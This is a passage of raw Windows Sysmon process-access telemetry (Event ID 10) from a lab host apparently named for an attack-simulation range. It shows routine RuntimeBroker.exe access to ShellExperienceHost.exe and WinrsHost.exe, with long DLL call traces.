4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245952C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245944C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245936C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245928C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245888C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49243732C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
